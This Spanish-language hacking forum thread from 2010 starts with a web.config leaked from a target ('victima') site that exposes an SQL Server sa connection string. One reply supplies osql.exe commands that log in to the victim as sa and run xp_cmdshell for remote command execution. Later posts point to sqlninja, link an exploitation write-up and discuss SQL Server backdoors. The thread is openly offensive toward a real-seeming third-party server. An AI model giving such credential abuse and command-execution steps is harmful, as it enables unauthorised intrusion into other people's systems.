Autor Tema: Que puedo hacer con este archivo web.config?  (Leído 7586 veces)

0 Usuarios y 1 Visitante están viendo este tema.

cer0x00

  • Mensajes: 7
  • Liked: 0
Que puedo hacer con este archivo web.config?
« : junio 14, 2010, 12:51:08 am »
http://www.victima.com/login/web.config

<?xml version="1.0" encoding="utf-8" ?>
<configuration>
    <!-- application specific settings -->
    <appSettings>
         <add key="ConnectionString" value="server=127.0.0.1;uid=sa;pwd=xxxxxx;database=xxxxxx" />
    </appSettings>
    <!-- forms based authentication -->
    <system.web>
        <!-- enable Forms authentication -->
        <!-- enable custom errors for the application -->
        <customErrors mode="RemoteOnly" defaultRedirect="NoSession.asp" />
        <!-- disable session state for application -->
        <sessionState mode="InProc" timeout="25000" />
    </system.web>
    <!-- set secure paths -->
    
    <location path="edit_master.aspx">
        <system.web>
            <authorization>
                <deny users="?" />
            </authorization>
        </system.web>
    </location>
    
    <!-- set globalization -->
    <system.web>
       <!--<globalization
          fileEncoding="utf-8"
          requestEncoding="utf-8"
          responseEncoding="utf-8"
          culture="id-ID"
          uiCulture="id-ID"/>-->
   </system.web>
  
   <system.web>
       <compilation debug="true"/>
       <trace enabled="true"/>  
   </system.web>
</configuration>


alguien me puede dar ideas.


« Última Modificación: junio 14, 2010, 02:33:25 pm por hkm »

nitr0us

  • ***
  • Mensajes: 359
  • Liked: 97
  • #rm -fr /
    • http://www.brainoverflow.org
Re: Que puedo hacer con este archivo web.config?
« Respuesta #1 : junio 14, 2010, 12:56:47 pm »
osql.exe -S www.victica.com -U sa -P sapassword -Q "SELECT @@version"

osql.exe -S www.victica.com -U sa -P sapassword -Q "xp_cmdshell 'whoami'"

Si xp_cmdshell no te sirve, google sobre técnicas avanzadas para sustituir xp_cmdshell, hay otros procedimientos almacenados por default muy buenos ;) ... pero te keda de tarea jaja..

Happy hacking ! :@
« Última Modificación: junio 14, 2010, 02:33:37 pm por hkm »

cer0x00

  • Mensajes: 7
  • Liked: 0
Re: Que puedo hacer con este archivo web.config?
« Respuesta #2 : junio 14, 2010, 09:02:17 pm »
1337

nitr0us

  • ***
  • Mensajes: 359
  • Liked: 97
  • #rm -fr /
    • http://www.brainoverflow.org
Re: Que puedo hacer con este archivo web.config?
« Respuesta #3 : junio 14, 2010, 11:15:15 pm »
Funcionó? o estaba firewalleado el 1433 o algún otro donde escuchaba mssql?...

Salu2

cer0x00

  • Mensajes: 7
  • Liked: 0
Re: Que puedo hacer con este archivo web.config?
« Respuesta #4 : junio 15, 2010, 12:18:52 am »
osql ?




cer0x00

  • Mensajes: 7
  • Liked: 0
Re: Que puedo hacer con este archivo web.config?
« Respuesta #6 : junio 15, 2010, 12:48:05 am »
entiendo el consepto OSQL...


dame 1 min (  lo instalo en linux..)

No hay para linu*x pufff(voy mal)
« Última Modificación: junio 15, 2010, 12:52:24 am por cer0x00 »

cer0x00

  • Mensajes: 7
  • Liked: 0
Re: Que puedo hacer con este archivo web.config?
« Respuesta #7 : junio 17, 2010, 08:30:45 pm »
sqlninja-


.....w0w0w0w0w

sunl3vy

  • *
  • Mensajes: 27
  • Liked: 8
Re: Que puedo hacer con este archivo web.config?
« Respuesta #8 : junio 18, 2010, 12:03:34 pm »
en parte de este post ilustro como me sirvio el web.config para una explotacion.
http://sunl3vy.blogspot.com/2010/06/h4ck-2k3.html

saludos.

hkm

  • Moderador
  • *
  • Mensajes: 1245
  • Liked: 287
    • Hakim.Ws
Re: Que puedo hacer con este archivo web.config?
« Respuesta #9 : junio 18, 2010, 08:06:58 pm »
Buena info sunlevy

sunl3vy

  • *
  • Mensajes: 27
  • Liked: 8
Re: Que puedo hacer con este archivo web.config?
« Respuesta #10 : junio 18, 2010, 08:50:54 pm »
gracias hkm, espero sea de ayuda para el autor del tema.
seria interesante enumerar algunas backdoors para sql server, probe las de cerrudo tools pero no me funciono, algo se me paso.
saludos.